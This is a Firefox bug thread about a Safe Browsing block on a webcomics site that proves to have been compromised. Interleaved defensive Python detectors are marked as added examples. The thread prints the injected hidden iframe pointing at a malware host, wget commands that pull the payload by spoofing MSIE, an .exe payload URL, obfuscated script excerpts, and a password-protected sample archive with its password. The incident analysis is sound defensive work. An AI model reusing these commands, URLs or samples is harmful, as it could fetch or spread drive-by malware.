Google "Safe Sites" advisory system is currently reporting false positives.

RESOLVED DUPLICATE of bug 401645

Product: Toolkit
Component: Safe Browsing
Severity: major

Reporter: John Barberio (Unassigned)

(Reporter)

Description

10 years ago
User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1

The Google "Safe Sites" advisory system as used in Firefox is currently reporting false positives for "Attack Sites". As an example, http://www.webcomicsnation.com/ is marked as an "Attack Site", but the diagnostics for that page at http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://www.webcomicsnation.com/ show zero malware results.

Either the original Google reporting system is broken, or the way Firefox interprets those reports is broken.

Marking Critical as it's causing major problems for a lot of people who are having their websites blocked by this for no reason.

Reproducible: Always

Steps to Reproduce:
1. Browse to http://www.webcomicsnation.com/ in Firefox set up as default.
Actual Results:  
Access blocked as an "Attack Site".

Expected Results:  
Browsed to the site.
(Reporter)

Comment 1

10 years ago
Note, marking with my own hardware and version tags for now, but this is probably cross-platform.
(Reporter)

Comment 2

10 years ago
Also, my mistake, Google's service is called "Safe Browsing" not "Safe Sites"

Comment 3

10 years ago
(In reply to comment #0)
> The Google "Safe Sites" advisory system as used in Firefox is currently
> reporting false positives for "Attack Sites". As an example,
> http://www.webcomicsnation.com/ is marked as an "Attack Site", but the
> diagnostics for that page at
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://www.webcomicsnation.com/
> shows zero malware results.
> 
> Either the original Google reporting system is broken, or the way Firefox
> interprets those reports is broken.

That page at safebrowsing.clients.google.com (not mozilla !!!) still mentions the site as a suspicious site, even though no malware was found on it during the last 90 days. This means it's still marked by Google, so Firefox will trigger the warning.

I don't see why this is a Firefox bug, it only reports what Google is saying (the database only contains the url, not the details).

What has really happened here is that the site was probably spreading malware in the past (or the automated Google engine at least thought it was). But nobody has ever contested that (there's a link for the webmaster at the bottom), so that might be the reason why it stays marked. As long as nobody takes action, it will stay listed, I think. Unless Google takes it off the list automatically after a while.

(In reply to comment #3)
> (...)
> That page at safebrowsing.clients.google.com (not mozilla !!!) still mentions
> the site as a suspicious site, even though no malware was found on it during
> the last 90 days. This means it's still marked by Google, so Firefox will
> trigger the warning.
> 
> I don't see why this is a Firefox bug, it only reports what Google is saying
> (the database only contains the url, not the details).

Firefox is a product of Mozilla or Google?

> What has really happened here, is that the site was probably spreading malware
> in the past (or the automated Google engine at least thought it was). But nobody
> has ever contested that (there's a link for the webmaster at the bottom), so
> (...)

It requires usage of Google's "Webmaster Tools" which, in turn, requires creation of a Google Account which, in turn, requires acceptance of Google's "Terms of Service", which is a long and uncool document. Not everybody wants to agree to these terms.

To the reporter of the bug: it is a cross-platform issue; I can confirm that the site is blocked also on the Linux version of FF.
(Reporter)

Comment 5

10 years ago
1) Is or has http://www.webcomicsnation.com/ ever been an attack site?

No. I'm a regular reader of multiple comics hosted by webcomicsnation. Prior to today, there has been no report from Google that it was an "attack site". The status displayed by Google, that there has been no history of it hosting malware or other indicators, shows that something has gone wrong here if it's now switched to being an "attack site".

2) Is this a Firefox bug?

If safebrowsing.clients.google.com is broken, then Firefox should not be using it as an authoritative part of decision making in blocking access to websites.

If Firefox is incorrectly interpreting a reply from Google, then Firefox has a bug in the phishing detection that's generating false positives.

3) Is this a big issue?

Yes. It will either
  a) Scare people into not using a legitimate site, and cause harm to that site's usability.
  b) Induce people into switching phishing protection off.

Correcting a bug in Google's database requires acceptance of Google's "Terms of Service" and creation of a Google Account. I also note that this is illegal under EU data protection and data privacy laws. But I have been unable to find the correct person to contact at Google about this.


So,
  a) The incorrect behaviour in Firefox should be fixed,
  b) Pressure should be applied to Google to rectify the problems with "Safe Browsing".



(Marking as cross-platform)
OS: Mac OS X → All
Hardware: Macintosh → All

No crash or data loss = not critical

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://www.webcomicsnation.com/
from bug 444438#3 "There's diagnostic information only for malware sites." (and not phishing sites)
Use http://www.google.com/safebrowsing/report_error/?tpl=mozilla to unblock it

marking as dupe of bug 401645
Severity: critical → normal
Status: UNCONFIRMED → RESOLVED
Last Resolved: 10 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 401645
(Reporter)

Comment 7

10 years ago
Reopening.

The issues raised in this bug are different to the ones of bug 401645.
i.e., should Firefox continue using "Safe Browsing" while it's prone to false positives.

Again, the issue here as it currently stands, it either
  a) Scares people into not using a legitimate site, and causes harm to that site's usability.
  b) Induces people into switching phishing protection off.

Until Google fix the issues at their end, then "Safe Browsing" integration in Firefox should probably be disabled, or replaced with a softer warning.
Status: RESOLVED → UNCONFIRMED
Resolution: DUPLICATE → ---

How do you know that there are more than your one single "false positive"?
I don't see here that your URL is a false positive; how do you know that?
I do not see one single confirmed false positive here.

Should people still use anti-virus software because it sometimes reports false positives?
Unless there is a very frequent error with the safebrowsing feature, there is no need to deactivate or modify it. Better safe than unprotected, and you can always disable this feature.


(Reporter)

Comment 9

10 years ago
This is a high traffic, well known, and popular site, that I personally visit daily. Firefox has only started hiding it behind its big warning page today. The linked 'diagnostics' from Google say that they haven't found anything wrong with the site, but apparently Firefox says it's on their list of bad sites anyway.
(Reporter)

Comment 10

10 years ago
There is no way to separately disable the Google side of phishing protection; you can only disable it entirely.

If people had virus scanners that flashed big warnings whenever they tried to play a popular, well known game, they'd switch the virus scanner off, and probably replace it with another one.

Since we're waiting for Google to fix the problems with false positives, and reporting of false positives, it seems wise to me to disable the Safe Browsing integration till then.

(As a side note. To quote from http://www.microsoft.com/windows/windows-vista/features/IE7-anti-phishing.aspx - "You can report any phishing sites or false positives to the Phishing Filter right from your browser."

Anything that makes Firefox more annoying than IE7 is a bad thing.)
Severity: normal → major

> This is a high traffic, well known, and popular site, that I personally visit
> daily

Yes, that can happen with sites that are well known and are high traffic sites. That is one of the great things: it warns you about sites where you never expect it. The question remains: why are you sure that it's a false positive?
There are, for example, ads included in that page that could trigger this warning.

Sorry, because you had a problem with 1 (one!) single URL and it's still unknown if this is a false positive, it's stupid to post such a statement as "it seems wise to me to disable the Safe Browsing integration till then."

Because of a possible false positive of one URL, which can always happen with automatic tools, you want to disable the additional security for the millions of Firefox users?

BTW: There are popular virus scanners that had a false positive for Windows system DLLs, or another one that caused a BSOD after an update.

(In reply to comment #8)
> How do you know that there are more than your one single "false positive" ?
> I don't see here that your URL is a false positive, how do you know that ?
> I do not see one single confirmed false positive here.
> 
and ... the website owner should request a review, see
http://www.stopbadware.org/home/reviewinfo

(In reply to comment #8)
> (...)
> no need to deactivate or modify it. Better safe than unprotected and you can
> always disable this feature.

"Safe"? Really? IMO it only gives a false sense of security (especially since in FF 3.0 the database of "bad sites" was not updated in some cases due to bug 434624). BTW, have you read the EULA recently? http://www.mozilla.com/en-US/legal/eula/firefox3-en.html : "(...) cannot guarantee that this information is comprehensive and error-free: some risky sites may not be identified, (...)."

There are numerous problems with Google's so-called "safebrowsing": issues with performance (e.g. bug 441481), with privacy (bug 368255, reported in Jan 2007 and initially related to FF2; the same problems (actually bigger) are in FF3), and other issues like the inability to view the source code of a blocked page (bug 435726), or some unexplained changes in source code related to "safebrowsing" done in a bug that was hidden for a long time (not now): bug 360387.
So, it should be disabled by default, and if someone really wants to be "protected" by Google, he/she may enable it. But not the other way around.

(In reply to comment #11)
> (...)
> Because of a possible false positive of one URL which can always happen with
> automatic tools you want to disable the additional security for the millions of
> Firefox users ?

I don't like the idea that one big multinational corporation, that is well known for its corporate paranoia [1] and secrecy (and a hunger for data about Internet users), may unilaterally decide what pages are "bad" and effectively block them.
 
> BTW: There are popular virus scanner that had a false positive for windows
> system dlls or another one that caused a BSOD after an update.
 
FF runs not only on Windows. I use mainly Linux and I don't use a "virus scanner", thank you.

[1] E.g. http://valleywag.com/tech/google/this-nda-never-existed-230407.php

BartZilla: Please stop commenting here; this is Bugzilla, not a forum or a general discussion about the phishing protection, and if you don't like Google or the phishing protection then disable the feature.

I'm going to mark this bug again as a dupe of bug 401645. Please do not reopen this bug, because this is a blocked site and you are not sure if that's right, and bug 401645 is to add a report function. That's the technical resolution for this bug report, and that means that this dupe is correct.

Status: UNCONFIRMED → RESOLVED
Last Resolved: 10 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 401645

(In reply to comment #14)
> (...) disable the feature.
> (...)

I can do this, but most users probably will not do this. Why? Because they're even unaware that the default "malware/phishing protection provider" is Google! It is (deliberately IMO) hidden, see bug 430741.

BTW - there is at least one Linux distribution that disables so-called "safebrowsing" by default in their packages of FF.

Comment 16

10 years ago
It looks like the job that updates the "diagnostic page" is currently stuck. That's unfortunate and we are looking into it. In the meantime, we noticed this page was compromised on (or before) the morning of 7/25. At the very bottom of the page was:

"<iframe src="http://dciman32.com/3332.htm" style="display:none"></iframe>"

This was cleaned up, and subsequently the site was removed from the list once we verified that it was clean.

Let's just say that this iframe did not do good things to your browser.

As for all the people claiming a "google conspiracy" / "control by a paranoid mega corporation" - this is an automated system, and we add things when we actually see drive-by downloads happening. It's not some false-positive laden heuristic, it's not a corporate agenda that hates webcomics, if a site is on the list it's because it's infecting users.

To address the multitude of comments about "This is a huge site, I visit it every day, no way it's bad" - what types of sites do you think hackers and evil-doers target? I'll give you a clue - they don't actively target sites that nobody visits. They go out and try to compromise sites that people (like you and millions of others) visit every day. Why? Because it's more bang for their buck. If they can compromise a high-trafficked site, that means they get more infections, which often translates to more bots (and $$$) for them. We see huge sites compromised every day, the fact that a site is high-trafficked does not magically make it somehow immune from hackers, script kiddies, or anyone else exploiting SQL injections, weak passwords, Apache/IIS vulnerabilities, or anything else they can use as an opportunity.
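Comment 16 describes the injection as a single invisible iframe appended to the bottom of an otherwise legitimate page. A site owner or responder who wants to check their own pages for that pattern can do it with a few lines of standard-library Python. The script below is an added example, not code from the bug thread or from Google; it flags iframes that are hidden (display:none, visibility:hidden, or a 0/1-pixel box) and load a host other than the page's own. The sample page, the same-site frame in it, and the /player.html path are constructed for the demo; the injected line itself is the one quoted in comment 16.

```python
"""Hidden off-site iframe finder (added example; not code from the bug or from Google)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _is_tiny(value):
    """True for width/height attributes of 0 or 1 pixel, a common way to hide an injected frame."""
    if value is None:
        return False
    digits = "".join(ch for ch in value if ch.isdigit())
    return digits != "" and int(digits) <= 1


class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> tags that are visually hidden and whose src points off-site."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if not host or host == self.page_host:
            return  # relative or same-host frames are left alone
        style = a.get("style", "").replace(" ", "").lower()
        hidden = ("display:none" in style
                  or "visibility:hidden" in style
                  or _is_tiny(a.get("width"))
                  or _is_tiny(a.get("height")))
        if hidden:
            # getpos() gives (line, column) of the tag being parsed
            self.findings.append({"line": self.getpos()[0], "host": host, "src": src})


def find_hidden_iframes(html, page_url):
    """Return a list of {line, host, src} for hidden iframes that load another host."""
    parser = HiddenIframeFinder(urlparse(page_url).hostname or "")
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: a visible same-site frame, then the kind of injected
# line comment 16 quotes at the very bottom of the compromised page.
SAMPLE_PAGE = """<html><body>
<h1>Comics</h1>
<iframe src="/player.html" width="400" height="300"></iframe>
<p>Comic of the day</p>
<iframe src="http://dciman32.com/3332.htm" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE, "http://www.webcomicsnation.com/"):
        print(f"line {hit['line']}: hidden iframe loading {hit['host']} ({hit['src']})")
```

Run it over a page fetched from your own server (or a saved copy) and review every hit; a 1x1 off-site frame from an ad network may be legitimate, but a display:none frame pointing at an unfamiliar host at the end of the document is exactly the indicator comment 16 describes, and the line number tells you where in the template or database-backed content to look.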

Comment 17

10 years ago
To clarify my last comment - I shouldn't say unequivocally that "if a site is on the list it's because it's infecting users." as false positives are possible. However, it is safe to say that if a site is on the list, it's because we believe to the best of our knowledge that the site is infecting users. We absolutely do not add anything to the list because of agendas / corporate views / anything of the sort. It is possible that there may be a false positive, which is why I should clarify my previous comment, but this is extremely extremely extremely rare, and I personally can't remember the last time it happened, and was not the case in this particular incident.
(Reporter)

Comment 18

10 years ago
To prevent the assumption of false positives, it might be wise to provide more information on why the site has been flagged on the Firefox side. As is, it's hard to work out *why* a site was flagged, and it's very easy to assume it's a false positive. (Especially when you can't view source to check if there really is a problem, and there's nothing showing up otherwise.)
(Reporter)

Comment 19

10 years ago
I couldn't seem to find the use of this iframe when I checked the site.

Comment 20

10 years ago
As I said in my previous comment, "This was cleaned up, and subsequently the site was removed from the list once we verified that it was clean." The iframe is no longer there (hence people are no longer getting infected, hence the site is off the list, working as intended.)

(In reply to comment #16)
> It looks like the job that updates the "diagnostic page" is currently stuck.

Thanks very much for the detailed response, Ian - I think it clarified things here. Is the update job likely to get stuck again? I'm sure I don't have to tell you that having accurate information on that report page is the single best way we have to allay fears that a site is falsely reported.

In any event though, it's good to know what actually happened here.

Comment 22

10 years ago
Is it likely to get stuck again? Probably not. It was running out of memory, so we're allocating more memory for the job. Of course, anything can happen ;-)

(In reply to comment #16)
> (...)
> 
> "<iframe src="http://dciman32.com/3332.htm" style="display:none"></iframe>"
> 

Interesting. It seems that the domain "dciman32.com" is no longer active, but a few days ago (when it worked) I conducted some small research. So, for the record:

First, I tried to download a "badsite" in question:
1) $ wget -O badsite.html -U 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0' --referer=http://www.webcomicsnation.com/ http://dciman32.com/3332.htm
 - result: a 1-byte file; I tried a few times, but to no avail; so, let's try with another UA:
2) $ wget -O badsite2.html -U 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' http://dciman32.com/3332.htm
 - success! file badsite2.html has length 11980 bytes; it is some obfuscated script written in JS (it is renamed to badsite2.html.txt in the package); after a manual edit it can be converted to a harmless /usr/bin/js script that outputs the "real" script:
3) $ cp badsite2.html badsite2.js
   $ gvim badsite2.js
   (..editing..)
   $ ./badsite2.js > badsite2-result.html.txt
4) badsite2-result.html.txt is a "final" (but also somewhat obfuscated) script; further analysis is needed, but some preliminary conclusions:
   . it probably downloads and runs some .exe file from http://dciman32.com/_neahfsry/3332dfqjqyqi.exe (saved in the package as 3332dfqjqyqi.exe.bad, this .exe needs further analysis if someone is interested...)
   . script is harmful (probably) only on Windows and MSIE, not on Firefox; for example, it seems that it tries to find "Start Menu\Programs\Startup" in various localizations; here is an excerpt from the script:
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Inicio\\Programas\\Inicio"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menuen Start\\Programmer\\Start"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Start\\Programma\\'s\\Opstarten"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Start\\Programy\\Autostart"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Avvio\\Programmi\\Esecuzione automatica"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Kaynnista-valikko\\Ohjelmat\\Kaynnistys"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start Menu\\Programlar\\BASLANGIC"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start-meny\\Programmer\\Oppstart"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Start-menyn\\Program\\Autostart"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+stds+stau+"Menu Iniciar\\Programas\\Iniciar"+stfln;eval(ev2);}catch(e){};};
	  if(fn2==""){try{Tv=hdrv;fn=Tv+"\\Dokumente und Einstellungen\\"+stau+"Startmenu\\Programme\\Autostart"+stfln;eval(ev2);}catch(e){};};

   . it probably exploits some vulnerability in QuickTime; excerpt from the script:
	var tobjst2=space;var haveqt=false;var chkqt=' <sc'+'ript language="VB'+'script"> \n On Error Resume Next \n Set theObject=CreateObject("QuickTimeCheckObject.QuickTimeCheck.1")

Final conclusions:
Considering the fact that the server has been returning a 1-byte file UNLESS requested from MSIE, it seems that Firefox users were NOT in danger. Moreover, the harmful script (probably) only works in MSIE on Windows, and definitely not on Linux (or Mac OS X).

You can download a package with all mentioned files here: http://bb.homelinux.org/security/research/files/badbug448103.zip (it is password-protected; the password is "bug448103" without quotes).
Disclaimer: Definitely DO NOT download/unpack this file if you don't know what you are doing. It is provided only for historical/educational/research purposes.

> (...)
> 
> Let's just say that this iframe did not do good things to your browser.

Yeah, if "my browser" is MSIE. However, the page that (allegedly) included this iframe was blocked in _Firefox_.

> As for all the people claiming a "google conspiracy" / "control by a paranoid
> mega corporation" - this is an automated system, and we add things when we
> actually see drive-by downloads happening. It's not some false-positive laden
> heuristic, it's not a corporate agenda that hates webcomics, if a site is on
> the list it's because it's infecting users.

Could you _precisely_ describe an algorithm used by Google to decide what pages are "bad"?

> To address the multitude of comments about "This is a huge site, I visit it
> every day, no way it's bad" - what types of sites do you think hackers and
> evil-doers target? I'll give you a clue - they don't actively target sites that
> nobody visits. They go out and try to compromise sites that people (like you
> and millions of others) visit every day. Why? Because it's more bang for their
> buck. If they can compromise a high-trafficked site, that means they get more
> infections, which often translates to more bots (and $$$) for them.

And built-in malware/phishing protection in Firefox translates to _what_ for Google? Because, you see, I don't clearly understand what the benefit for Google is from implementing and maintaining such a huge and expensive operation (expensive, because: someone had to write quite a complicated piece of software, on the client side (i.e. in FF) and on the server side; someone has to constantly maintain a list of "badsites"; the whole "safebrowsing" thing costs a lot of bandwidth, especially from the server's point of view; etc. etc.). Google is not some charitable institution, so what are the financial benefits for you from this whole thing?

> We see huge
> sites compromised every day, the fact that a site is high-trafficked does not
> magically make it somehow immune from hackers, script kiddies, or anyone else
> exploiting SQL injections, weak passwords, Apache/IIS vulnerabilities, or
> anything else they can use as an opportunity.

You have enumerated some potential vulnerabilities on the server side, but malware also has to exploit some vulns on the client side, i.e. in the browser. If there is some exploitable vulnerability in Firefox, then the only correct solution is to solve the problem _in Firefox_.
The whole idea with blacklisting some URLs is bad, bad security [1], and I'm pretty sure that Google realizes this (after all, Google employs some security experts like Michał Zalewski (lcamtuf) or Tavis Ormandy [2]...). So, it makes me wonder what is the real purpose of this thing...

[1] See e.g. this article by Marcus Ranum: http://www.ranum.com/security/computer_security/editorials/dumb/ "#2) Enumerating Badness".
[2] Here is a post on his blog related to the antivirus industry (this industry also tries to "enumerate badness", and fails): http://my.opera.com/taviso/blog/month-of-mcafee-bugs

(In reply to comment #17)
> To clarify my last comment - I shouldn't say unequivocally that "if a site is
> on
> the list it's because it's infecting users." as false positives are possible.
> However, it is safe to say that if a site is on the list, it's because we
> believe to the best of our knowledge that the site is infecting users. We
> absolutely do not add anything to the list because of agendas / corporate views
> / anything of the sort.

Perhaps not today, but how could you be so sure about the future? You know, all is changing, people, corporations and their attitude etc...

> It is possible that there may be a false positive,
> which is why I should clarify my previous comment, but this is extremely
> extremely extremely rare, and I personally can't remember the last time it
> happened,

See bug 351836 (probably the funniest bug in Bugzilla I've ever seen ;->).

> and was not the case in this particular incident.

Really? It seems that you block pages harmless for Firefox, but only potentially harmful for MSIE...
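The key observation in comment 23 is that the server behind the injected iframe answered a Firefox User-Agent with a 1-byte body and an MSIE User-Agent with an 11980-byte script: the payload was cloaked by client type, which is also why the reporter's own browser showed nothing wrong. A responder triaging a flagged URL can check for that behaviour systematically by fetching the same URL once per User-Agent and comparing the bodies. The probe below is an added example written for this thread, not code from the bug or from either vendor. The two UA strings are the ones used in comment 23; the crawler string, the cloaked.example URL, the stand-in payload and the fake_fetch stand-in server are constructed so the demo runs offline. The live http_fetch helper is provided for real use from an isolated analysis machine only and is never called by the demo.

```python
"""User-Agent cloaking probe (added example; not code from the bug thread)."""
import hashlib
from urllib.request import Request, urlopen

# firefox3 and msie6 are the strings used in comment 23; "crawler" is constructed.
USER_AGENTS = {
    "firefox3": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0",
    "msie6": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "crawler": "Mozilla/5.0 (compatible; ExampleBot/1.0; +http://crawler.example)",
}


def http_fetch(url, headers, timeout=10):
    """Live fetcher over urllib; returns the response body as bytes.
    For use from an isolated analysis host only; the offline demo never calls it."""
    with urlopen(Request(url, headers=headers), timeout=timeout) as resp:
        return resp.read()


def probe_cloaking(url, fetch, user_agents=USER_AGENTS, referer=None):
    """Fetch url once per User-Agent and report whether the bodies differ.

    fetch(url, headers) is injected so the probe can run against a stand-in.
    A host that hands one client class a near-empty body and another a full
    payload (the 1-byte vs 11980-byte responses in comment 23) is cloaking.
    """
    per_ua = {}
    for name, ua in user_agents.items():
        headers = {"User-Agent": ua}
        if referer:  # comment 23 also sent the compromised page as Referer
            headers["Referer"] = referer
        body = fetch(url, headers)
        per_ua[name] = {"size": len(body), "sha256": hashlib.sha256(body).hexdigest()}
    distinct = {r["sha256"] for r in per_ua.values()}
    return {"variants": len(distinct), "cloaked": len(distinct) > 1, "per_ua": per_ua}


# Constructed stand-in for the server described in comment 23: a 1-byte reply
# unless the User-Agent claims to be MSIE. The payload is a harmless placeholder.
_PAYLOAD = b"<script>/* constructed stand-in for the obfuscated script */</script>\n" * 8


def fake_fetch(url, headers):
    """Offline replacement for http_fetch that reproduces the cloaking behaviour."""
    return _PAYLOAD if "MSIE" in headers.get("User-Agent", "") else b"\n"


if __name__ == "__main__":
    report = probe_cloaking("http://cloaked.example/3332.htm", fake_fetch,
                            referer="http://www.webcomicsnation.com/")
    for name, r in report["per_ua"].items():
        print(f"{name:9s} {r['size']:6d} bytes  sha256={r['sha256'][:16]}...")
    print("cloaking detected" if report["cloaked"] else "responses identical across UAs")
```

Comparing hashes rather than sizes catches servers that return different scripts of the same length, and adding a Referer matters because some of these hosts only serve the payload to visitors arriving from the compromised page. A cloaking result is also the answer to the "it looks fine in my browser" objection raised earlier in the thread: the absence of a payload in one client says nothing about what other clients receive, which is why the diagnostic page, not a manual visit, is the right evidence to ask for.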

It DOESN'T MATTER at all if the page is harmless in Firefox at the moment, because that can change at any second, and this warning also blocks people from opening this page with the IEtab addon.
That such a feature doesn't give you 100% security should be known, because there is no 100% security!
That you could get false positives is expected if you run automatic scanning, but there is no need to disable this feature because of that unless it happens frequently.
Bugzilla is not the right place to discuss this; please go to the newsgroups, thanks.


(Assignee)

Updated

4 years ago
Component: Phishing Protection → Phishing Protection
Product: Firefox → Toolkit